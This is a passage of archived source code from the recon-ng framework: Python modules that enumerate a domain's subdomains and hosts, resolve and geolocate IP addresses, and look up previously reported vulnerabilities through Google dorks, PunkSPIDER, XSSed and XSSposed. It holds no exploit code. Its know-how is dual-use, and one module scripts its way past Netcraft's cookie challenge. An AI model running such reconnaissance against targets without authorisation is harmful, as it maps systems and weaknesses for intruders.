'Harvests hosts from Netcraft.com. Updates the \'hosts\' table with the results.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): url = 'http://searchdns.netcraft.com/' pattern = '<td align\=\"left\">\s*<a href=\"http://(.*?)/"' # answer challenge cookie cookiejar = CookieJar() payload = {'restriction': 'site+ends+with', 'host': 'test.com'} resp = self.request(url, payload=payload, cookiejar=cookiejar) cookiejar = resp.cookiejar for cookie in cookiejar: if cookie.name == 'netcraft_js_verification_challenge': challenge = cookie.value response = hashlib.sha1(urllib.unquote(challenge)).hexdigest() cookiejar.set_cookie(self.make_cookie('netcraft_js_verification_response', '%s' % response, '.netcraft.com')) break for domain in domains: self.heading(domain, level=0) payload['host'] = domain subs = [] # execute search engine queries and scrape results storing subdomains in a list # loop until no Next Page is available while True: self.verbose('URL: %s?%s' % (url, encode_payload(payload))) resp = self.request(url, payload=payload, cookiejar=cookiejar) content = resp.text sites = re.findall(pattern, content) # create a unique list sites = list(set(sites)) # add subdomain to list if not already exists for site in sites: if site not in subs: subs.append(site) self.add_hosts(site) # verifies if there's more pages to look while grabbing the correct # values for our payload... link = re.findall(r'(\blast\=\b|\bfrom\=\b)(.*?)&', content) if not link: break else: payload['last'] = link[0][1] payload['from'] = link[1][1] self.verbose('Next page available! Requesting again...' ) # sleep script to avoid lock-out self.verbose('Sleeping to Avoid Lock-out...') time.sleep(random.randint(5,15)) if not subs: self.output('No results found.') ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/shodan_hostname.py��������������������0000664�0000000�0000000�00000002333�13122657244�0027247�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Shodan Hostname Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Harvests hosts from the Shodan API by using the \'hostname\' search operator. Updates the \'hosts\' table with the results.', 'required_keys': ['shodan_api'], 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', 'options': ( ('limit', 1, True, 'limit number of api requests per input source (0 = unlimited)'), ), } def module_run(self, domains): limit = self.options['limit'] for domain in domains: self.heading(domain, level=0) query = 'hostname:%s' % (domain) results = self.search_shodan_api(query, limit) for host in results: address = host['ip_str'] port = host['port'] if not host['hostnames']: host['hostnames'] = [None] for hostname in host['hostnames']: self.add_ports(ip_address=address, port=port, host=hostname) self.add_hosts(host=hostname, ip_address=address) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/ssl_san.py����������������������������0000664�0000000�0000000�00000002256�13122657244�0025543�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import json class Module(BaseModule): meta = { 'name': 'SSL SAN Lookup', 'author': 'Zach Grace (@ztgrace) zgrace@403labs.com and Bryan Onel (@BryanOnel86) onel@oneleet.com', 'description': 'Uses the ssltools.com API to obtain the Subject Alternative Names for a domain. Updates the \'hosts\' table with the results.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): for domain in domains: self.heading(domain, level=0) url = 'http://www.ssltools.com/api/scan' resp = self.request(url, method="POST", payload={'url': domain}) if not resp.json: self.output('SSL endpoint not reachable or response invalid for \'%s\'' % domain) continue if not resp.json['response']['san_entries']: self.output('No Subject Alternative Names found for \'%s\'' % domain) continue hosts = [x.strip() for x in resp.json['response']['san_entries'] if '*' not in x] for host in hosts: self.add_hosts(host) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/threatcrowd.py������������������������0000664�0000000�0000000�00000001334�13122657244�0026423�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'ThreatCrowd DNS lookup', 'author': 'mike2dot0', 'description': 'Leverages the ThreatCrowd passive DNS API to discover hosts/subdomains.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): for domain in domains: self.heading(domain, level=0) resp = self.request(url = 'https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=%s' % domain) if resp.json.get('response_code') == '1': for subdomain in resp.json.get('subdomains'): self.add_hosts(host=subdomain) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-vulnerabilities/����������������������������0000775�0000000�0000000�00000000000�13122657244�0025563�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-vulnerabilities/ghdb.py���������������������0000664�0000000�0000000�00000006064�13122657244�0027047�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.search import GoogleWebMixin from itertools import groupby import json import os import urlparse def _optionize(s): return 'ghdb_%s' % (s.replace(' ', '_').lower()) def _build_options(ghdb): categories = [] for key, group in groupby([x['category'] for x in sorted(ghdb, key=lambda x: x['category'])]): categories.append((_optionize(key), False, True, 'enable/disable the %d dorks in this category' % (len(list(group))))) return categories class Module(BaseModule, GoogleWebMixin): with open(os.path.join(BaseModule.data_path, 'ghdb.json')) as fp: ghdb = json.load(fp) meta = { 'name': 'Google Hacking Database', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Searches for possible vulnerabilites in a domain by leveraging the Google Hacking Database (GHDB) and the \'site\' search operator. Updates the \'vulnerabilities\' table with the results.', 'comments': ( 'Special thanks to the Offenvise Security crew for maintaining the GHDB and making it available to open source projects like Recon-ng. Thanks Muts!', ), 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', 'options': [ ('dorks', None, False, 'file containing an alternate list of Google dorks'), ] + _build_options(ghdb), } def module_run(self, domains): dorks = self.ghdb # use alternate list of dorks if the option is set if self.options['dorks'] and os.path.exists(self.options['dorks']): with open(self.options['dorks']) as fp: dorks = [x.strip() for x in fp.readlines()] for domain in domains: self.heading(domain, level=0) base_query = 'site:%s' % (domain) for dork in dorks: # build query based on alternate list if isinstance(dork, basestring): query = ' '.join((base_query, dork)) self._search(query) # build query based on ghdb entry elif isinstance(dork, dict): if not dork['querystring']: continue if self.options[_optionize(dork['category'])]: # parse the query string to extract the dork syntax parsed = urlparse.urlparse(dork['querystring']) params = urlparse.parse_qs(parsed.query) # unparsable url if 'q' not in params: continue query = ' '.join((base_query, params['q'][0])) self._search(query) def _search(self, query): for result in self.search_google_web(query): host = urlparse.urlparse(result).netloc data = { 'host': host, 'reference': query, 'example': result, 'category': 'Google Dork', } self.add_vulnerabilities(**data) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-vulnerabilities/punkspider.py���������������0000664�0000000�0000000�00000004046�13122657244�0030325�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime import re class Module(BaseModule): meta = { 'name': 'PunkSPIDER Vulnerabilty Finder', 'author': 'Tim Tomes (@LaNMaSteR53) and thrapt (thrapt@gmail.com)', 'description': 'Leverages the PunkSPIDER API to search for previosuly discovered vulnerabltiies on hosts within a domain.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): vuln_types = ['bsqli', 'sqli', 'xss', 'trav', 'mxi', 'osci', 'xpathi'] url = 'https://punkspider.hyperiongray.com/service/search/domain/' for domain in domains: self.heading(domain, level=0) payload = {'searchKey': 'url', 'searchValue': domain, 'filterType': 'OR'} payload['filters'] = vuln_types vulnerable = False page = 1 while True: payload['pageNumber'] = page resp = self.request(url, method='POST', payload=payload, content='json') results = resp.json['output']['domainSummaryDTOs'] if not results: break for result in results: data = {} data['host'] = result['id'] data['reference'] = 'https://punkspider.hyperiongray.com/service/search/detail/%s' % ('.'.join(data['host'].split('.')[::-1])) resp = self.request(data['reference']) vulns = resp.json['data'] for vuln in vulns: vulnerable = True data['example'] = vuln['vulnerabilityUrl'] data['publish_date'] = datetime.strptime(result['timestamp'], '%Y-%m-%dT%H:%M:%SZ') data['category'] = vuln['bugType'].upper() data['status'] = None self.add_vulnerabilities(**data) page += 1 if not vulnerable: self.output('No vulnerabilites found.') ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-vulnerabilities/xssed.py��������������������0000775�0000000�0000000�00000003365�13122657244�0027275�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime import re import time class Module(BaseModule): meta = { 'name': 'XSSed Domain Lookup', 'author': 'Micah Hoffman (@WebBreacher)', 'description': 'Checks XSSed.com for XSS records associated with a domain and displays the first 20 results.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): url = 'http://xssed.com/search?key=%s' url_vuln = 'http://xssed.com/mirror/%s/' for domain in domains: self.heading(domain, level=0) resp = self.request(url % (domain)) vulns = re.findall('mirror/([0-9]+)/\' target=\'_blank\'>', resp.text) for vuln in vulns: # Go fetch and parse the specific page for this item resp_vuln = self.request(url_vuln % vuln) # Parse the response and get the details details = re.findall('<th class="row3"[^>]*>[^:?]+[:?]+(.+?)<\/th>', resp_vuln.text)#.replace(' ', ' ')) details = [self.html_unescape(x).strip() for x in details] data = {} data['host'] = details[5] data['reference'] = url_vuln % vuln data['publish_date'] = datetime.strptime(details[1], '%d/%m/%Y') data['category'] = details[6] data['status'] = re.search('([UNFIXED]+)',details[3]).group(1).lower() data['example'] = details[8] self.add_vulnerabilities(**data) # results in 503 errors if not throttled time.sleep(1) if not vulns: self.output('No vulnerabilites found.') ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-vulnerabilities/xssposed.py�����������������0000664�0000000�0000000�00000002562�13122657244�0030012�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime import re class Module(BaseModule): meta = { 'name': 'XSSposed Domain Lookup', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Checks XSSposed.com for XSS records associated with a domain.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): url = 'https://www.xssposed.org/api/1/search/?domain=%s' for domain in domains: self.heading(domain, level=0) resp = self.request(url % (domain)) vulns = resp.xml.findall('item') for vuln in vulns: data = {} data['host'] = vuln.find('host').text data['reference'] = vuln.find('url').text data['publish_date'] = datetime.strptime(vuln.find('reporteddate').text, '%a, %d %b %Y %H:%M:%S +0000') data['category'] = vuln.find('type').text data['status'] = 'unfixed' if vuln.find('fixed').text == '0' else 'fixed' resp_vuln = self.request(data['reference']) data['example'] = re.search('href="([^"]*%s[^"]*)"' % (data['host']), resp_vuln.text).group(1) self.add_vulnerabilities(**data) if not vulns: self.output('No vulnerabilites found.') ����������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-domains/��������������������������������������0000775�0000000�0000000�00000000000�13122657244�0023522�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-domains/migrate_hosts.py����������������������0000664�0000000�0000000�00000002204�13122657244�0026742�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import os import re class Module(BaseModule): meta = { 'name': 'Hosts to Domains Data Migrator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Adds a new domain for all the hostnames stored in the \'hosts\' table.', 'comments': ( 'This modules considers that everything after the first element could contain other hosts besides the current. Therefore, hosts > 2 domains deep will create domains > 2 elements in length.', ), 'query': 'SELECT DISTINCT host FROM hosts WHERE host IS NOT NULL', } def module_run(self, hosts): # ip address regex regex = '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' # only migrate hosts that aren't ip addresses hosts = [x for x in hosts if not re.match(regex, x[0])] with open(os.path.join(self.data_path, 'suffixes.txt')) as f: suffixes = [line.strip().lower() for line in f if len(line)>0 and line[0] is not '#'] domains = self.hosts_to_domains(hosts, suffixes) for domain in domains: self.add_domains(domain=domain) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-hosts/����������������������������������������0000775�0000000�0000000�00000000000�13122657244�0023230�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-hosts/bing_ip.py������������������������������0000664�0000000�0000000�00000003345�13122657244�0025216�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.utils.parsers import parse_hostname from urlparse import urlparse import re class Module(BaseModule): meta = { 'name': 'Bing API IP Neighbor Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Leverages the Bing API and "ip:" advanced search operator to enumerate other virtual hosts sharing the same IP address. Updates the \'hosts\' table with the results.', 'required_keys': ['bing_api'], 'comments': ( 'This module only stores hosts whose domain matches an entry in the domains table.', ), 'query': 'SELECT DISTINCT ip_address FROM hosts WHERE ip_address IS NOT NULL', 'options': ( ('restrict', True, True, 'restrict added hosts to current domains'), ), } def module_run(self, addresses): # build a regex that matches any of the stored domains domains = [x[0] for x in self.query('SELECT DISTINCT domain from domains WHERE domain IS NOT NULL')] regex = '(?:%s)' % ('|'.join(['\.'+re.escape(x)+'$' for x in domains])) for address in addresses: self.heading(address, level=0) query = 'ip:%s' % (address) results = self.search_bing_api(query) if not results: self.verbose('No additional hosts discovered at \'%s\'.' % (address)) for result in results: host = parse_hostname(result['displayUrl']) self.verbose(host) # apply restriction if self.options['restrict'] and not re.search(regex, host): continue # add hosts to the database self.add_hosts(host, address) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-hosts/freegeoip.py����������������������������0000664�0000000�0000000�00000003203�13122657244�0025545�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import json class Module(BaseModule): meta = { 'name': 'FreeGeoIP', 'author': 'Gerrit Helm (G) and Tim Tomes (@LaNMaSteR53)', 'description': 'Leverages the freegeoip.net API to geolocate a host by IP address. Updates the \'hosts\' table with the results.', 'comments': ( 'Allows up to 10,000 queries per hour by default. Once this limit is reached, all requests will result in HTTP 403, forbidden, until the quota is cleared.', ), 'query': 'SELECT DISTINCT ip_address FROM hosts WHERE ip_address IS NOT NULL', 'options': ( ('serverurl', 'http://freegeoip.net', True, 'overwrite server url (e.g. for local installations)'), ), } def module_run(self, hosts): for host in hosts: url = '%s/json/%s' % (self.options['serverurl'], host) resp = self.request(url) if resp.json: jsonobj = resp.json else: self.error('Invalid JSON response for \'%s\'.\n%s' % (host, resp.text)) continue region = ', '.join([str(jsonobj[x]).title() for x in ['city', 'region_name'] if jsonobj[x]]) or None country = jsonobj['country_name'].title() latitude = str(jsonobj['latitude']) longitude = str(jsonobj['longitude']) self.output('%s - %s,%s - %s' % (host, latitude, longitude, ', '.join([x for x in [region, country] if x]))) self.query('UPDATE hosts SET region=?, country=?, latitude=?, longitude=? WHERE ip_address=?', (region, country, latitude, longitude, host)) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-hosts/ipinfodb.py�����������������������������0000664�0000000�0000000�00000003104�13122657244�0025372�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import json import time class Module(BaseModule): meta = { 'name': 'IPInfoDB GeoIP', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Leverages the ipinfodb.com API to geolocate a host by IP address. Updates the \'hosts\' table with the results.', 'required_keys': ['ipinfodb_api'], 'query': 'SELECT DISTINCT ip_address FROM hosts WHERE ip_address IS NOT NULL', } def module_run(self, hosts): api_key = self.keys.get('ipinfodb_api') for host in hosts: url = 'http://api.ipinfodb.com/v3/ip-city/?key=%s&ip=%s&format=json' % (api_key, host) resp = self.request(url) if resp.json: jsonobj = resp.json else: self.error('Invalid JSON response for \'%s\'.\n%s' % (host, resp.text)) continue if jsonobj['statusCode'].lower() == 'error': self.error(jsonobj['statusMessage']) continue time.sleep(.7) region = ', '.join([str(jsonobj[x]).title() for x in ['cityName', 'regionName'] if jsonobj[x]]) or None country = jsonobj['countryName'].title() latitude = str(jsonobj['latitude']) longitude = str(jsonobj['longitude']) self.output('%s - %s,%s - %s' % (host, latitude, longitude, ', '.join([x for x in [region, country] if x]))) self.query('UPDATE hosts SET region=?, country=?, latitude=?, longitude=? WHERE ip_address=?', (region, country, latitude, longitude, host)) ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-hosts/resolve.py������������������������������0000664�0000000�0000000�00000003061�13122657244�0025261�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.resolver import ResolverMixin import dns.resolver class Module(BaseModule, ResolverMixin): meta = { 'name': 'Hostname Resolver', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Resolves the IP address for a host. Updates the \'hosts\' table with the results.', 'comments': ( 'Note: Nameserver must be in IP form.', ), 'query': 'SELECT DISTINCT host FROM hosts WHERE host IS NOT NULL AND ip_address IS NULL', } def module_run(self, hosts): q = self.get_resolver() for host in hosts: try: answers = q.query(host) except dns.resolver.NXDOMAIN: self.verbose('%s => Unknown' % (host)) except dns.resolver.NoAnswer: self.verbose('%s => No answer' % (host)) except (dns.resolver.NoNameservers, dns.resolver.Timeout): self.verbose('%s => DNS Error' % (host)) else: for i in range(0, len(answers)): if i == 0: self.query('UPDATE hosts SET ip_address=? WHERE host=?', (answers[i].address, host)) else: data = { 'host': self.to_unicode(host), 'ip_address': self.to_unicode(answers[i].address) } self.insert('hosts', data, data.keys()) self.output('%s => %s' % (host, answers[i].address)) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-hosts/reverse_resolve.py����������������������0000664�0000000�0000000�00000003224�13122657244�0027015�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.resolver import ResolverMixin import dns.resolver import dns.reversename class Module(BaseModule, ResolverMixin): meta = { 'name': 'Reverse Resolver', 'author': 'John Babio (@3vi1john), @vulp1n3, and Tim Tomes (@LaNMaSteR53)', 'description': 'Conducts a reverse lookup for each IP address to resolve the hostname. Updates the \'hosts\' table with the results.', 'query': 'SELECT DISTINCT ip_address FROM hosts WHERE ip_address IS NOT NULL', } def module_run(self, addresses): max_attempts = 3 resolver = self.get_resolver() for address in addresses: attempt = 0 while attempt < max_attempts: try: addr = dns.reversename.from_address(address) hosts = resolver.query(addr,'PTR') except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer): self.verbose('%s => No record found.' % (address)) except dns.resolver.Timeout: self.verbose('%s => Request timed out.' % (address)) attempt += 1 continue except (dns.resolver.NoNameservers): self.verbose('%s => Invalid nameserver.' % (address)) #self.error('Invalid nameserver.') #return else: for host in hosts: host = str(host)[:-1] # slice the trailing dot self.add_hosts(host, address) # break out of the loop attempt = max_attempts ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-hosts/ssltools.py�����������������������������0000664�0000000�0000000�00000007227�13122657244�0025474�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from datetime import datetime import re class Module(BaseModule): meta = { 'name': 'SSLTools.com Host Name Lookups', 'author': 'Tim Maletic (borrowing from the ssl_san module by Zach Graces)', 'description': 'Uses the ssltools.com site to obtain host names from a site\'s SSL certificate metadata to update the \'hosts\' table. Security issues with the certificate trust are pushed to the \'vulnerabilities\' table.', 'comments': ( 'This module only stores hosts whose domain matches an entry in the domains table.', ), 'query': 'SELECT DISTINCT ip_address FROM hosts WHERE ip_address IS NOT NULL', 'options': ( ('restrict', True, True, 'restrict added hosts to current domains'), ), } def module_run(self, hosts): # build a regex that matches any of the stored domains domains = [x[0] for x in self.query('SELECT DISTINCT domain from domains WHERE domain IS NOT NULL')] regex = '(?:%s)' % ('|'.join(['\.'+re.escape(x)+'$' for x in domains])) for ip_address in hosts: self.heading(ip_address, level=0) url = 'http://www.ssltools.com/certificate_lookup/%s' % ip_address html = self.request(url).text # names san = re.search('<br>Subject Alternative Names :(.*?)<br>', html) cn = re.search('<br>Common Name :(.*?)<br>', html) names = "" if san is None: self.output('No Subject Alternative Names found for \'%s\'' % ip_address) else: self.output('Subject Alternative Names: \'%s\'' % san.group(1)) names = san.group(1) if cn is None: self.output('No Common Name found for \'%s\'' % ip_address) else: self.output('Common Name: \'%s\'' % cn.group(1)) names += cn.group(1) if not names: continue hosts = [x.strip() for x in names.split(',') if '*' not in x] for host in hosts: # apply restriction if self.options['restrict'] and not re.search(regex, host): continue self.add_hosts(host) # vulns data = {} data['host'] = ip_address data['reference'] = url data['status'] = 'unfixed' data['publish_date'] = datetime.strptime(re.search('<h4>generated at (.*) -\d{4} \(click', html).group(1), '%Y-%m-%d %H:%M:%S') vuln_expired = re.search('<br>Incorrect : Certificate date is invalid[^<]*expired[^<]*<br>', html) if vuln_expired: self.output('Vulnerability: ') data['category'] = 'SSL Certificate Expired' self.add_vulnerabilities(**data) vuln_hostname_mismatch = re.search('<br>Incorrect : Certificate Name does not match hostname', html) if vuln_hostname_mismatch: self.output('Vulnerability: ') data['category'] = 'SSL Certificate Name Does Not Match Hostname' self.add_vulnerabilities(**data) vuln_untrusted = re.search('<br>SSL Certificate is not trusted<br>The certificate is not signed by a trusted authority', html) # ssltools appears to say "the certificate is not signed by a trusted authority" whenever there is a trust problem, no matter what the cause if vuln_untrusted: self.output('Vulnerability: ') data['category'] = 'SSL Certificate Not Signed By Trusted Authority' self.add_vulnerabilities(**data) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-locations/������������������������������������0000775�0000000�0000000�00000000000�13122657244�0024063�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-locations/migrate_hosts.py��������������������0000664�0000000�0000000�00000001076�13122657244�0027311�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import os import re class Module(BaseModule): meta = { 'name': 'Hosts to Locations Data Migrator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Adds a new location for all the locations stored in the \'hosts\' table.', 'query': 'SELECT DISTINCT latitude, longitude FROM hosts WHERE latitude IS NOT NULL AND longitude IS NOT NULL', } def module_run(self, locations): for location in locations: self.add_locations(latitude=location[0], longitude=location[1]) ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-ports/����������������������������������������0000775�0000000�0000000�00000000000�13122657244�0023237�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/hosts-ports/shodan_ip.py����������������������������0000664�0000000�0000000�00000002257�13122657244�0025563�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Shodan IP Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53) and Matt Pluckett (@t3lc0)', 'description': 'Harvests port information from the Shodan API by using the \'ip\' search operator. Updates the \'ports\' table with the results.', 'required_keys': ['shodan_api'], 'query': 'SELECT DISTINCT ip_address FROM hosts WHERE ip_address IS NOT NULL', 'options': ( ('limit', 1, True, 'limit number of api requests per input source (0 = unlimited)'), ), } def module_run(self, ipaddrs): limit = self.options['limit'] for ipaddr in ipaddrs: self.heading(ipaddr, level=0) query = 'ip:%s' % (ipaddr) results = self.search_shodan_api(query, limit) for host in results: address = host['ip_str'] port = host['port'] if not host['hostnames']: host['hostnames'] = [None] for hostname in host['hostnames']: self.add_ports(ip_address=address, port=port, host=hostname) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-locations/��������������������������������0000775�0000000�0000000�00000000000�13122657244�0024716�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-locations/geocode.py����������������������0000664�0000000�0000000�00000002520�13122657244�0026674�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'Address Geocoder', 'author': 'Quentin Kaiser (contact@quentinkaiser.be)', 'description': 'Queries the Google Maps API to obtain coordinates for an address. Updates the \'locations\' table with the results.', 'query': 'SELECT DISTINCT street_address FROM locations WHERE street_address IS NOT NULL', } def module_run(self, addresses): for address in addresses: self.verbose("Geocoding '%s'..." % (address)) payload = {'address' : address, 'sensor' : 'false'} url = 'https://maps.googleapis.com/maps/api/geocode/json' resp = self.request(url, payload=payload) # kill the module if nothing is returned if len(resp.json['results']) == 0: self.output('Unable to geocode \'%s\'.' % (address)) return # loop through the results for result in resp.json['results']: lat = result['geometry']['location']['lat'] lon = result['geometry']['location']['lng'] # store the result self.add_locations(lat, lon, address) self.query('DELETE FROM locations WHERE street_address=? AND latitude IS NULL AND longitude IS NULL', (address,)) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/locations-locations/reverse_geocode.py��������������0000664�0000000�0000000�00000002763�13122657244�0030440�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'Reverse Geocoder', 'author': 'Quentin Kaiser (contact@quentinkaiser.be)', 'description': 'Queries the Google Maps API to obtain an address from coordinates.', 'query': 'SELECT DISTINCT latitude || \',\' || longitude FROM locations WHERE latitude IS NOT NULL AND longitude IS NOT NULL', } def module_run(self, points): for point in points: self.verbose("Reverse geocoding (%s)..." % (point)) payload = {'latlng' : point, 'sensor' : 'false'} url = 'https://maps.googleapis.com/maps/api/geocode/json' resp = self.request(url, payload=payload) # kill the module if nothing is returned if len(resp.json['results']) == 0: self.output('Unable to resolve an address for (%s).' % (point)) return # loop through the results found = False for result in resp.json['results']: if result['geometry']['location_type'] == 'ROOFTOP': found = True lat = point.split(',')[0] lon = point.split(',')[1] address = result['formatted_address'] # store the result self.add_locations(lat, lon, address) if found: self.query('DELETE FROM locations WHERE latitude=? AND longitude=? AND street_address IS NULL', (lat, 